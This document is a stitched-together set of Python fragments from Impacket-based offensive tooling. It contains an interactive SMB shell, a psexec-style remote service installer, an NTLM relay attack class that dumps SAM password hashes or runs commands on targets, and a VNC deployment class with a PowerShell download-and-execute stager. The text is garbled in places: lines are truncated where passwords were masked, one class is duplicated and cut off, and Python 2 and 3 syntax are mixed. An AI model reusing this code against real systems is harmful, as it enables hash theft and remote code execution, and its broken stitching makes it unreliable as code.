def queryInfo(self, tid, fid):
while True:
try:
info = self._conn.queryInfo(tid, fid)
return info
except Exception as e:
if str(e).find('STATUS_SHARING_VIOLATION') >= 0:
# Output not finished, let's wait
time.sleep(2)
else:
raise Exception(e)
def getFile(self, share_name, path_name, callback):
while True:
try:
self._conn.getFile(share_name, path_name, callback)
break
except Exception as e:
if str(e).find('STATUS_SHARING_VIOLATION') >= 0:
# Output not finished, let's wait
time.sleep(2)
else:
raise Exception(e)
def deleteFile(self, share_name, path_name):
while True:
try:
self._conn.deleteFile(share_name, path_name)
self._log.debug("File {} deleted".format(path_name))
break
except Exception as e:
if str(e).find('STATUS_SHARING_VIOLATION') >= 0:
time.sleep(2)
else:
raise Exception(e)
def putFile(self, share_name, path_name, callback):
try:
self._conn.putFile(share_name, path_name, callback)
self._log.debug("File {} uploaded".format(path_name))
except Exception as e:
raise Exception(
"An error occured while uploading %s on %s share : %s" %
(path_name, share_name, e))
def readFile(self, tid, fid, offset, size):
return self._conn.readFile(tid, fid, offset, size, singleCall=False)
def closeFile(self, tid, fid):
return self._conn.closeFile(tid, fid)
def disconnectTree(self, tid):
return self._conn.disconnectTree(tid)
def isadmin(self):
try:
self.connectTree("C$")
return RetCode(ERROR_SUCCESS)
except Exception as e:
return RetCode(ERROR_ACCESS_DENIED, e)
def close(self):
if self._conn is not None:
self._log.debug("Closing Impacket connection")
self._conn.close()
def clean(self):
try:
self.close()
return RetCode(ERROR_SUCCESS)
except Exception as e:
return RetCode(ERROR_CONNECTION_CLEANING, e)
class MiniImpacketShell(cmd.Cmd):
def __init__(self, smbClient, tcpShell=None):
#If the tcpShell parameter is passed (used in ntlmrelayx),
# all input and output is redirected to a tcp socket
# instead of to stdin / stdout
if tcpShell is not None:
cmd.Cmd.__init__(self, stdin=tcpShell.stdin, stdout=tcpShell.stdout)
sys.stdout = tcpShell.stdout
sys.stdin = tcpShell.stdin
sys.stderr = tcpShell.stdout
self.use_rawinput = False
self.shell = tcpShell
else:
cmd.Cmd.__init__(self)
self.shell = None
self.prompt = '# '
self.smb = smbClient
self.username, self.password, self.domain, self.lmhash, self.nthash, self.aesKey, self.TGT, self.TGS = smbClient.getCredentials()
self.tid = None
self.intro = 'Type help for list of commands'
self.pwd = ''
self.share = None
self.loggedIn = True
self.last_output = None
self.completion = []
def emptyline(self):
pass
def precmd(self, line):
# switch to unicode
return line
def onecmd(self,s):
retVal = False
try:
retVal = cmd.Cmd.onecmd(self,s)
except Exception as e:
LOG.error(e)
LOG.debug('Exception info', exc_info=True)
return retVal
def do_exit(self,line):
if self.shell is not None:
self.shell.close()
return True
def do_shell(self, line):
output = os.popen(line).read()
print(output)
self.last_output = output
def do_help(self,line):
print("""
open {host,port=445} - opens a SMB connection against the target host/port
login {domain/username,passwd} - logs into the current SMB connection, no parameters for NULL connection. If no password specified, it'll be prompted
kerberos_login {domain/username,passwd} - logs into the current SMB connection using Kerberos. If no password specified, it'll be prompted. Use the DNS resolvable domain name
login_hash {domain/username,lmhash:nthash} - logs into the current SMB connection using the password hashes
logoff - logs off
shares - list available shares
use {sharename} - connect to an specific share
cd {path} - changes the current directory to {path}
lcd {path} - changes the current local directory to {path}
pwd - shows current remote directory
password - changes the user password, the new password will be prompted for input
ls {wildcard} - lists all the files in the current directory
rm {file} - removes the selected file
mkdir {dirname} - creates the directory under the current path
rmdir {dirname} - removes the directory under the current path
put {filename} - uploads the filename into the current path
get {filename} - downloads the filename from the current path
mget {mask} - downloads all files from the current directory matching the provided mask
cat {filename} - reads the filename from the current path
mount {target,path} - creates a mount point from {path} to {target} (admin required)
umount {path} - removes the mount point at {path} without deleting the directory (admin required)
list_snapshots {path} - lists the vss snapshots for the specified path
info - returns NetrServerInfo main results
who - returns the sessions currently connected at the target host (admin required)
close - closes the current SMB Session
exit - terminates the server process (and this session)
""")
def do_password(self, line):
if self.loggedIn is False:
LOG.error("Not logged in")
return
from getpass import getpass
newPassword = getpass("New Password:"******"SMBv1 dialect used")
elif dialect == SMB2_DIALECT_002:
LOG.info("SMBv2.0 dialect used")
elif dialect == SMB2_DIALECT_21:
LOG.info("SMBv2.1 dialect used")
else:
LOG.info("SMBv3.0 dialect used")
self.share = None
self.tid = None
self.pwd = ''
self.loggedIn = False
self.password = None
self.lmhash = None
self.nthash = None
self.username = None
def do_login(self,line):
if self.smb is None:
LOG.error("No connection open")
return
l = line.split(' ')
username = ''
password = ''
domain = ''
if len(l) > 0:
username = l[0]
if len(l) > 1:
password = l[1]
if username.find('/') > 0:
domain, username = username.split('/')
if password == '' and username != '':
from getpass import getpass
password = getpass("Password:"******"GUEST Session Granted")
else:
LOG.info("USER Session Granted")
self.loggedIn = True
def do_kerberos_login(self,line):
if self.smb is None:
LOG.error("No connection open")
return
l = line.split(' ')
username = ''
password = ''
domain = ''
if len(l) > 0:
username = l[0]
if len(l) > 1:
password = l[1]
if username.find('/') > 0:
domain, username = username.split('/')
if domain == '':
LOG.error("Domain must be specified for Kerberos login")
return
if password == '' and username != '':
from getpass import getpass
password = getpass("Password:"******"GUEST Session Granted")
else:
LOG.info("USER Session Granted")
self.loggedIn = True
def do_login_hash(self,line):
if self.smb is None:
LOG.error("No connection open")
return
l = line.split(' ')
domain = ''
if len(l) > 0:
username = l[0]
if len(l) > 1:
hashes = l[1]
else:
LOG.error("Hashes needed. Format is lmhash:nthash")
return
if username.find('/') > 0:
domain, username = username.split('/')
lmhash, nthash = hashes.split(':')
self.smb.login(username, '', domain,lmhash=lmhash, nthash=nthash)
self.username = username
self.lmhash = lmhash
self.nthash = nthash
if self.smb.isGuestSession() > 0:
LOG.info("GUEST Session Granted")
else:
LOG.info("USER Session Granted")
self.loggedIn = True
def do_logoff(self, line):
if self.smb is None:
LOG.error("No connection open")
return
self.smb.logoff()
del self.smb
self.share = None
self.smb = None
self.tid = None
self.pwd = ''
self.loggedIn = False
self.password = None
self.lmhash = None
self.nthash = None
self.username = None
def do_info(self, line):
if self.loggedIn is False:
LOG.error("Not logged in")
return
rpctransport = transport.SMBTransport(self.smb.getRemoteHost(), filename = r'\srvsvc', smb_connection = self.smb)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(srvs.MSRPC_UUID_SRVS)
resp = srvs.hNetrServerGetInfo(dce, 102)
print("Version Major: %d" % resp['InfoStruct']['ServerInfo102']['sv102_version_major'])
print("Version Minor: %d" % resp['InfoStruct']['ServerInfo102']['sv102_version_minor'])
print("Server Name: %s" % resp['InfoStruct']['ServerInfo102']['sv102_name'])
print("Server Comment: %s" % resp['InfoStruct']['ServerInfo102']['sv102_comment'])
print("Server UserPath: %s" % resp['InfoStruct']['ServerInfo102']['sv102_userpath'])
print("Simultaneous Users: %d" % resp['InfoStruct']['ServerInfo102']['sv102_users'])
def do_who(self, line):
if self.loggedIn is False:
LOG.error("Not logged in")
return
rpctransport = transport.SMBTransport(self.smb.getRemoteHost(), filename = r'\srvsvc', smb_connection = self.smb)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(srvs.MSRPC_UUID_SRVS)
resp = srvs.hNetrSessionEnum(dce, NULL, NULL, 10)
for session in resp['InfoStruct']['SessionInfo']['Level10']['Buffer']:
print("host: %15s, user: %5s, active: %5d, idle: %5d" % (
session['sesi10_cname'][:-1], session['sesi10_username'][:-1], session['sesi10_time'],
session['sesi10_idle_time']))
def do_shares(self, line):
if self.loggedIn is False:
LOG.error("Not logged in")
return
resp = self.smb.listShares()
for i in range(len(resp)):
print(resp[i]['shi1_netname'][:-1])
def do_use(self,line):
if self.loggedIn is False:
LOG.error("Not logged in")
return
self.share = line
self.tid = self.smb.connectTree(line)
self.pwd = '\\'
self.do_ls('', False)
def complete_cd(self, text, line, begidx, endidx):
return self.complete_get(text, line, begidx, endidx, include = 2)
def do_cd(self, line):
if self.tid is None:
LOG.error("No share selected")
return
p = line.replace('/','\\')
oldpwd = self.pwd
if p[0] == '\\':
self.pwd = line
else:
self.pwd = ntpath.join(self.pwd, line)
self.pwd = ntpath.normpath(self.pwd)
# Let's try to open the directory to see if it's valid
try:
fid = self.smb.openFile(self.tid, self.pwd, creationOption = FILE_DIRECTORY_FILE, desiredAccess = FILE_READ_DATA |
FILE_LIST_DIRECTORY, shareMode = FILE_SHARE_READ | FILE_SHARE_WRITE )
self.smb.closeFile(self.tid,fid)
except SessionError:
self.pwd = oldpwd
raise
def do_lcd(self, s):
print(s)
if s == '':
print(os.getcwd())
else:
os.chdir(s)
def do_pwd(self,line):
if self.loggedIn is False:
LOG.error("Not logged in")
return
print(self.pwd)
def do_ls(self, wildcard, display = True):
if self.loggedIn is False:
LOG.error("Not logged in")
return
if self.tid is None:
LOG.error("No share selected")
return
if wildcard == '':
pwd = ntpath.join(self.pwd,'*')
else:
pwd = ntpath.join(self.pwd, wildcard)
self.completion = []
pwd = pwd.replace('/','\\')
pwd = ntpath.normpath(pwd)
for f in self.smb.listPath(self.share, pwd):
if display is True:
print("%crw-rw-rw- %10d %s %s" % (
'd' if f.is_directory() > 0 else '-', f.get_filesize(), time.ctime(float(f.get_mtime_epoch())),
f.get_longname()))
self.completion.append((f.get_longname(), f.is_directory()))
def do_rm(self, filename):
if self.tid is None:
LOG.error("No share selected")
return
f = ntpath.join(self.pwd, filename)
file = f.replace('/','\\')
self.smb.deleteFile(self.share, file)
def do_mkdir(self, path):
if self.tid is None:
LOG.error("No share selected")
return
p = ntpath.join(self.pwd, path)
pathname = p.replace('/','\\')
self.smb.createDirectory(self.share,pathname)
def do_rmdir(self, path):
if self.tid is None:
LOG.error("No share selected")
return
p = ntpath.join(self.pwd, path)
pathname = p.replace('/','\\')
self.smb.deleteDirectory(self.share, pathname)
def do_put(self, pathname):
if self.tid is None:
LOG.error("No share selected")
return
src_path = pathname
dst_name = os.path.basename(src_path)
fh = open(pathname, 'rb')
f = ntpath.join(self.pwd,dst_name)
finalpath = f.replace('/','\\')
self.smb.putFile(self.share, finalpath, fh.read)
fh.close()
def complete_get(self, text, line, begidx, endidx, include = 1):
# include means
# 1 just files
# 2 just directories
p = line.replace('/','\\')
if p.find('\\') < 0:
items = []
if include == 1:
mask = 0
else:
mask = 0x010
for i in self.completion:
if i[1] == mask:
items.append(i[0])
if text:
return [
item for item in items
if item.upper().startswith(text.upper())
]
else:
return items
def do_mget(self, mask):
if mask == '':
LOG.error("A mask must be provided")
return
if self.tid is None:
LOG.error("No share selected")
return
self.do_ls(mask,display=False)
if len(self.completion) == 0:
LOG.error("No files found matching the provided mask")
return
for file_tuple in self.completion:
if file_tuple[1] == 0:
filename = file_tuple[0]
filename = filename.replace('/', '\\')
fh = open(ntpath.basename(filename), 'wb')
pathname = ntpath.join(self.pwd, filename)
try:
LOG.info("Downloading %s" % (filename))
self.smb.getFile(self.share, pathname, fh.write)
except:
fh.close()
os.remove(filename)
raise
fh.close()
def do_get(self, filename):
if self.tid is None:
LOG.error("No share selected")
return
filename = filename.replace('/','\\')
fh = open(ntpath.basename(filename),'wb')
pathname = ntpath.join(self.pwd,filename)
try:
self.smb.getFile(self.share, pathname, fh.write)
except:
fh.close()
os.remove(filename)
raise
fh.close()
def do_cat(self, filename):
if self.tid is None:
LOG.error("No share selected")
return
filename = filename.replace('/','\\')
fh = BytesIO()
pathname = ntpath.join(self.pwd,filename)
try:
self.smb.getFile(self.share, pathname, fh.write)
except:
raise
output = fh.getvalue()
encoding = "" # chardet.detect(output)["encoding"]
error_msg = "[-] Output cannot be correctly decoded, are you sure the text is readable ?"
if encoding:
try:
print(output.decode(encoding))
except:
print(error_msg)
finally:
fh.close()
else:
print(error_msg)
fh.close()
def do_close(self, line):
self.do_logoff(line)
def do_list_snapshots(self, line):
l = line.split(' ')
if len(l) > 0:
pathName= l[0].replace('/','\\')
# Relative or absolute path?
if pathName.startswith('\\') is not True:
pathName = ntpath.join(self.pwd, pathName)
snapshotList = self.smb.listSnapshots(self.tid, pathName)
if not snapshotList:
print("No snapshots found")
return
for timestamp in snapshotList:
print(timestamp)
def do_mount(self, line):
l = line.split(' ')
if len(l) > 1:
target = l[0].replace('/','\\')
pathName= l[1].replace('/','\\')
# Relative or absolute path?
if pathName.startswith('\\') is not True:
pathName = ntpath.join(self.pwd, pathName)
self.smb.createMountPoint(self.tid, pathName, target)
def do_umount(self, mountpoint):
mountpoint = mountpoint.replace('/','\\')
# Relative or absolute path?
if mountpoint.startswith('\\') is not True:
mountpoint = ntpath.join(self.pwd, mountpoint)
mountPath = ntpath.join(self.pwd, mountpoint)
self.smb.removeMountPoint(self.tid, mountPath)
def do_EOF(self, line):
print('Bye!\n')
return True
class ServiceInstall:
def __init__(self, SMBObject, exeFile, serviceName=''):
self._rpctransport = 0
self.__service_name = serviceName if len(serviceName) > 0 else ''.join([random.choice(string.ascii_letters) for i in range(4)])
self.__binary_service_name = ''.join([random.choice(string.ascii_letters) for i in range(8)]) + '.exe'
self.__exeFile = exeFile
# We might receive two different types of objects, always end up
# with a SMBConnection one
if isinstance(SMBObject, smb.SMB) or isinstance(SMBObject, smb3.SMB3):
self.connection = SMBConnection(existingConnection = SMBObject)
else:
self.connection = SMBObject
self.share = ''
def getShare(self):
return self.share
def getShares(self):
# Setup up a DCE SMBTransport with the connection already in place
LOG.info("Requesting shares on %s....." % (self.connection.getRemoteHost()))
try:
self._rpctransport = transport.SMBTransport(self.connection.getRemoteHost(),
self.connection.getRemoteHost(),filename = r'\srvsvc',
smb_connection = self.connection)
dce_srvs = self._rpctransport.get_dce_rpc()
dce_srvs.connect()
dce_srvs.bind(srvs.MSRPC_UUID_SRVS)
resp = srvs.hNetrShareEnum(dce_srvs, 1)
return resp['InfoStruct']['ShareInfo']['Level1']
except:
LOG.critical("Error requesting shares on %s, aborting....." % (self.connection.getRemoteHost()))
raise
def createService(self, handle, share, path):
LOG.info("Creating service %s on %s....." % (self.__service_name, self.connection.getRemoteHost()))
# First we try to open the service in case it exists. If it does, we remove it.
try:
resp = scmr.hROpenServiceW(self.rpcsvc, handle, self.__service_name+'\x00')
except Exception as e:
if str(e).find('ERROR_SERVICE_DOES_NOT_EXIST') >= 0:
# We're good, pass the exception
pass
else:
raise e
else:
# It exists, remove it
scmr.hRDeleteService(self.rpcsvc, resp['lpServiceHandle'])
scmr.hRCloseServiceHandle(self.rpcsvc, resp['lpServiceHandle'])
# Create the service
command = '%s\\%s' % (path, self.__binary_service_name)
try:
resp = scmr.hRCreateServiceW(self.rpcsvc, handle,self.__service_name + '\x00', self.__service_name + '\x00',
lpBinaryPathName=command + '\x00', dwStartType=scmr.SERVICE_DEMAND_START)
except:
LOG.critical("Error creating service %s on %s" % (self.__service_name, self.connection.getRemoteHost()))
raise
else:
return resp['lpServiceHandle']
def openSvcManager(self):
LOG.info("Opening SVCManager on %s....." % self.connection.getRemoteHost())
# Setup up a DCE SMBTransport with the connection already in place
self._rpctransport = transport.SMBTransport(self.connection.getRemoteHost(), self.connection.getRemoteHost(),
filename = r'\svcctl', smb_connection = self.connection)
self.rpcsvc = self._rpctransport.get_dce_rpc()
self.rpcsvc.connect()
self.rpcsvc.bind(scmr.MSRPC_UUID_SCMR)
try:
resp = scmr.hROpenSCManagerW(self.rpcsvc)
except:
LOG.critical("Error opening SVCManager on %s....." % self.connection.getRemoteHost())
raise Exception('Unable to open SVCManager')
else:
return resp['lpScHandle']
def copy_file(self, src, tree, dst):
LOG.info("Uploading file %s" % dst)
if isinstance(src, str):
# We have a filename
fh = open(src, 'rb')
else:
# We have a class instance, it must have a read method
fh = src
f = dst
pathname = f.replace('/','\\')
try:
self.connection.putFile(tree, pathname, fh.read)
except:
LOG.critical("Error uploading file %s, aborting....." % dst)
raise
fh.close()
def findWritableShare(self, shares):
# Check we can write a file on the shares, stop in the first one
writeableShare = None
for i in shares['Buffer']:
if i['shi1_type'] == srvs.STYPE_DISKTREE or i['shi1_type'] == srvs.STYPE_SPECIAL:
share = i['shi1_netname'][:-1]
tid = 0
try:
tid = self.connection.connectTree(share)
self.connection.openFile(tid, '\\', FILE_WRITE_DATA, creationOption=FILE_DIRECTORY_FILE)
except:
LOG.critical("share '%s' is not writable." % share)
pass
else:
LOG.info('Found writable share %s' % share)
writeableShare = str(share)
break
finally:
if tid != 0:
self.connection.disconnectTree(tid)
return writeableShare
def install(self):
if self.connection.isGuestSession():
LOG.critical("Authenticated as Guest. Aborting")
self.connection.logoff()
del self.connection
else:
fileCopied = False
serviceCreated = False
# Do the stuff here
try:
# Let's get the shares
shares = self.getShares()
self.share = self.findWritableShare(shares)
if self.share is None:
return False
self.copy_file(self.__exeFile ,self.share,self.__binary_service_name)
fileCopied = True
svcManager = self.openSvcManager()
if svcManager != 0:
serverName = self.connection.getServerName()
if self.share.lower() == 'admin$':
path = '%systemroot%'
else:
if serverName != '':
path = '\\\\%s\\%s' % (serverName, self.share)
else:
path = '\\\\127.0.0.1\\' + self.share
service = self.createService(svcManager, self.share, path)
serviceCreated = True
if service != 0:
# Start service
LOG.info('Starting service %s.....' % self.__service_name)
try:
scmr.hRStartServiceW(self.rpcsvc, service)
except:
pass
scmr.hRCloseServiceHandle(self.rpcsvc, service)
scmr.hRCloseServiceHandle(self.rpcsvc, svcManager)
return True
except Exception as e:
LOG.critical("Error performing the installation, cleaning up: %s" %e)
try:
scmr.hRControlService(self.rpcsvc, service, scmr.SERVICE_CONTROL_STOP)
except:
pass
if fileCopied is True:
try:
self.connection.deleteFile(self.share, self.__binary_service_name)
except:
pass
if serviceCreated is True:
try:
scmr.hRDeleteService(self.rpcsvc, service)
except:
pass
return False
def uninstall(self):
fileCopied = True
serviceCreated = True
# Do the stuff here
try:
# Let's get the shares
svcManager = self.openSvcManager()
if svcManager != 0:
resp = scmr.hROpenServiceW(self.rpcsvc, svcManager, self.__service_name+'\x00')
service = resp['lpServiceHandle']
LOG.info('Stopping service %s.....' % self.__service_name)
try:
scmr.hRControlService(self.rpcsvc, service, scmr.SERVICE_CONTROL_STOP)
except:
pass
LOG.info('Removing service %s.....' % self.__service_name)
scmr.hRDeleteService(self.rpcsvc, service)
scmr.hRCloseServiceHandle(self.rpcsvc, service)
scmr.hRCloseServiceHandle(self.rpcsvc, svcManager)
LOG.info('Removing file %s.....' % self.__binary_service_name)
self.connection.deleteFile(self.share, self.__binary_service_name)
except Exception:
LOG.critical("Error performing the uninstallation, cleaning up" )
try:
scmr.hRControlService(self.rpcsvc, service, scmr.SERVICE_CONTROL_STOP)
except:
pass
if fileCopied is True:
try:
self.connection.deleteFile(self.share, self.__binary_service_name)
except:
try:
self.connection.deleteFile(self.share, self.__binary_service_name)
except:
pass
pass
if serviceCreated is True:
try:
scmr.hRDeleteService(self.rpcsvc, service)
except:
pass
class SMBAttack(ProtocolAttack):
"""
This is the SMB default attack class.
It will either dump the hashes from the remote target, or open an interactive
shell if the -i option is specified.
"""
PLUGIN_NAMES = ["SMB"]
def __init__(self, config, SMBClient, username):
ProtocolAttack.__init__(self, config, SMBClient, username)
if isinstance(SMBClient, smb.SMB) or isinstance(SMBClient, smb3.SMB3):
self.__SMBConnection = SMBConnection(existingConnection=SMBClient)
else:
self.__SMBConnection = SMBClient
self.__answerTMP = ''
if self.config.interactive:
#Launch locally listening interactive shell
self.tcpshell = TcpShell()
else:
self.tcpshell = None
if self.config.exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, self.config.exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
if self.tcpshell is not None:
LOG.info('Started interactive SMB client shell via TCP on 127.0.0.1:%d' % self.tcpshell.port)
#Start listening and launch interactive shell
self.tcpshell.listen()
self.shell = MiniImpacketShell(self.__SMBConnection,self.tcpshell.socketfile)
self.shell.cmdloop()
return
if self.config.exeFile is not None:
result = self.installService.install()
if result is True:
LOG.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
from impacket.examples.ntlmrelayx.utils.enum import EnumLocalAdmins
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
if self.__SMBConnection.getDialect() == smb.SMB_DIALECT:
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= smb.SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception as e:
if "rpc_s_access_denied" in str(e): # user doesn't have correct privileges
if self.config.enumLocalAdmins:
LOG.info("Relayed user doesn't have admin on {}. Attempting to enumerate users who do...".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding)))
enumLocalAdmins = EnumLocalAdmins(self.__SMBConnection)
try:
localAdminSids, localAdminNames = enumLocalAdmins.getLocalAdmins()
LOG.info("Host {} has the following local admins (hint: try relaying one of them here...)".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding)))
for name in localAdminNames:
LOG.info("Host {} local admin member: {} ".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding), name))
except DCERPCException:
LOG.info("SAMR access denied")
return
# Something else went wrong. aborting
LOG.error(str(e))
return
try:
if self.config.command is not None:
remoteOps._RemoteOperations__executeRemote(self.config.command)
LOG.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__answerTMP = ''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
print(self.__answerTMP.decode(self.config.encoding, 'replace'))
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes')
LOG.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception as e:
LOG.error(str(e))
finally:
if samHashes is not None:
samHashes.finish()
if remoteOps is not None:
remoteOps.finish()
class VNCEXEC:
def __init__(self,
username='',
password='',
domain='',
hashes=None,
aesKey=None,
share=None,
doKerberos=False,
kdcHost=None):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__share = share
self.__doKerberos = doKerberos
self.__kdcHost = kdcHost
self.shell = None
self.vnc_upload_path = None
self.vnc_upload_filename = None
self.full_file_path = None
self.smbConnection = None
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def findWritableShare(self, shares):
# Check we can write a file on the shares, stop in the first one
for i in shares['Buffer']:
if i['shi1_type'] == srvs.STYPE_DISKTREE or i[
'shi1_type'] == srvs.STYPE_SPECIAL:
share = i['shi1_netname'][:-1]
if (len(share) == 2 and share[1] == '$') or share == 'ADMIN$':
pass
else:
logging.info('Bad share %s' % share)
continue
try:
self.smbConnection.createDirectory(share, 'ARTKOND')
except:
# Can't create, pass
#import traceback
#print traceback.print_exc()
logging.critical("share '%s' is not writable." % share)
pass
else:
logging.info('Found writable share %s' % share)
self.smbConnection.deleteDirectory(share, 'ARTKOND')
return str(share)
return None
def getShares(self):
# Setup up a DCE SMBTransport with the connection already in place
logging.info("Requesting shares on %s....." %
(self.smbConnection.getRemoteHost()))
try:
self._rpctransport = transport.SMBTransport(
self.smbConnection.getRemoteHost(),
self.smbConnection.getRemoteHost(),
filename=r'\srvsvc',
smb_connection=self.smbConnection)
dce_srvs = self._rpctransport.get_dce_rpc()
dce_srvs.connect()
dce_srvs.bind(srvs.MSRPC_UUID_SRVS)
resp = srvs.hNetrShareEnum(dce_srvs, 1)
return resp['InfoStruct']['ShareInfo']['Level1']
except:
logging.critical("Error requesting shares on %s, aborting....." %
(self.smbConnection.getRemoteHost()))
raise
def get_vnc_upload_path(self, share):
if share == 'ADMIN$':
return "C:\\windows\\temp\\"
if len(share) == 2:
if share[1] == '$':
return share[0] + ":\\"
def copy_file(self, file, tree, dst):
logging.info("Uploading " + self.vnc_upload_path +
self.vnc_upload_filename)
pathname = string.replace(dst, '/', '\\')
try:
self.smbConnection.putFile(tree, pathname, file.read)
except:
logging.critical("Error uploading file %s, aborting....." % dst)
raise
def upload_vnc(self, addr, bc_ip, contype, vncpass, vncport,
invoke_vnc_path):
fileCopied = False
serviceCreated = False
# Do the stuff here
try:
# Let's get the shares
if self.__share is None:
shares = self.getShares()
self.__share = self.findWritableShare(shares)
if self.__share is None:
logging.critical("Couldn't find writable share")
raise
self.vnc_upload_path = self.get_vnc_upload_path(self.__share)
if self.vnc_upload_path is None:
logging.critical("Can't deduct local path from share name " +
self.__share)
raise
self.vnc_upload_filename = uuid.uuid4().hex[:8] + '.bat'
encoded_bat = BatEncode(
open(invoke_vnc_path, 'rb').read(),
self.vnc_upload_path + self.vnc_upload_filename,
self.launch_string)
encoded_buffer = encoded_bat.get_buffer()
mem_file = StringIO.StringIO(encoded_buffer)
if self.__share == 'ADMIN$':
self.full_file_path = '\\TEMP\\' + self.vnc_upload_filename
else:
self.full_file_path = '\\' + self.vnc_upload_filename
self.copy_file(mem_file, self.__share, self.full_file_path)
fileCopied = True
except:
raise
def run(self, addr, method, bc_ip, contype, vncpass, vncport,
invoke_vnc_path, httpport):
if bc_ip is None:
bc_ip = ''
self.launch_string = 'Invoke-Vnc '
if contype == 'bind':
pass
elif contype == 'reverse':
if bc_ip is None:
print 'Ip addr required for reverse connection'
sys.exit(1)
else:
self.launch_string += '-IpAddress ' + bc_ip
self.launch_string += ' -ConType ' + contype + ' -Port ' + vncport + ' -Password ' + vncpass
logging.info("Using powershell launch string '" + self.launch_string +
"'")
if method == 'upload':
logging.info("Connecting to SMB at " + addr)
self.smbConnection = SMBConnection(addr, addr)
if self.__doKerberos is False:
self.smbConnection.login(self.__username, self.__password,
self.__domain, self.__lmhash,
self.__nthash)
else:
self.smbConnection.kerberosLogin(self.__username,
self.__password,
self.__domain,
self.__lmhash,
self.__nthash,
self.__aesKey,
kdcHost=self.__kdcHost)
dialect = self.smbConnection.getDialect()
if dialect == SMB_DIALECT:
logging.info("SMBv1 dialect used")
elif dialect == SMB2_DIALECT_002:
logging.info("SMBv2.0 dialect used")
elif dialect == SMB2_DIALECT_21:
logging.info("SMBv2.1 dialect used")
else:
logging.info("SMBv3.0 dialect used")
self.upload_vnc(addr, bc_ip, contype, vncpass, vncport,
invoke_vnc_path)
dcom = DCOMConnection(addr,
self.__username,
self.__password,
self.__domain,
self.__lmhash,
self.__nthash,
self.__aesKey,
oxidResolver=True,
doKerberos=self.__doKerberos,
kdcHost=self.__kdcHost)
try:
iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,
wmi.IID_IWbemLevel1Login)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
iWbemServices = iWbemLevel1Login.NTLMLogin(
'//./root/cimv2', NULL, NULL)
iWbemLevel1Login.RemRelease()
win32Process, _ = iWbemServices.GetObject('Win32_Process')
self.shell = RemoteShell(self.__share, win32Process, None)
logging.info("Executing " + self.vnc_upload_path +
self.vnc_upload_filename)
if contype == 'bind':
logging.info("VNC server should start at {0}:{1}".format(
addr, vncport))
else:
logging.info("Expect reverse VNC connection at port " +
vncport)
self.shell.onecmd(self.vnc_upload_path +
self.vnc_upload_filename)
logging.info(
"Sleeping 10 seconds to allow bat file to unpack itself before deleting it"
)
time.sleep(10)
self.smbConnection.deleteFile(self.__share,
self.full_file_path)
logging.info("File " + self.__share + self.full_file_path +
" deleted")
except (Exception, KeyboardInterrupt), e:
#import traceback
#traceback.print_exc()
logging.error(str(e))
logging.info(
"Error on executing bat file. Trying to delete it before exiting"
)
self.smbConnection.deleteFile(self.__share,
self.full_file_path)
logging.info("{0} deleted".format(self.__share +
self.full_file_path))
if self.smbConnection is not None:
self.smbConnection.logoff()
dcom.disconnect()
sys.stdout.flush()
sys.exit(1)
if self.smbConnection is not None:
self.smbConnection.logoff()
dcom.disconnect()
elif method == 'download':
if bc_ip == '':
logging.critical(
"-bc-ip needed when using download delivery method")
sys.exit(1)
ps1_line = "IEX (New-Object System.Net.Webclient).DownloadString('http://{0}:{1}/Invoke-Vnc.ps1'); {2}".format(
bc_ip, httpport, self.launch_string)
logging.info("Stager: {0}".format(ps1_line))
command = str(PSOneliner(ps1_line))
logging.debug(command)
dcom = DCOMConnection(addr,
self.__username,
self.__password,
self.__domain,
self.__lmhash,
self.__nthash,
self.__aesKey,
oxidResolver=True,
doKerberos=self.__doKerberos,
kdcHost=self.__kdcHost)
try:
iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,
wmi.IID_IWbemLevel1Login)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
iWbemServices = iWbemLevel1Login.NTLMLogin(
'//./root/cimv2', NULL, NULL)
iWbemLevel1Login.RemRelease()
win32Process, _ = iWbemServices.GetObject('Win32_Process')
self.shell = RemoteShell(None, win32Process, None)
self.shell.onecmd(command)
while True:
pass
dcom.disconnect()
except (Exception, KeyboardInterrupt), e:
#import traceback
#traceback.print_exc()
logging.error(str(e))
logging.critical("Closing DCOM connection")
dcom.disconnect()
sys.stdout.flush()
raise
class VNCEXEC:
def __init__(self, username='', password='', domain='', hashes=None, aesKey=None, share=None, doKerberos=False, kdcHost=None):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__share = share
self.__doKerberos = doKerberos
self.__kdcHost = kdcHost
self.shell = None
self.vnc_upload_path = None
self.vnc_upload_filename = None
self.full_file_path = None
self.smbConnection = None
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def findWritableShare(self, shares):
# Check we can write a file on the shares, stop in the first one
for i in shares['Buffer']:
